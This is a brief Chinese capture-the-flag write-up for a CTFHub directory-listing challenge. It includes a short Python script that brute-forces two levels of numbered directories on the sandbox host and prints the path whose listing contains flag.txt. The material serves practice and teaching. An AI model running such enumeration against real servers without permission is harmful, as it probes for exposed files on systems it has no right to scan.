题目的页面
题目的目录遍历有一定规律,都是数字排序,而且只有两层目录
#! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests url = "http://challenge-cf866d8944333af5.sandbox.ctfhub.com:10800/flag_in_here/" for i in range(5): for j in range(5): url_ctf =url+str(i)+"/"+str(j) r = requests.get(url_ctf) r.encoding = 'utf-8' get_file=r.text if "flag.txt" in get_file: print(url_ctf)
执行后flag在这个页面中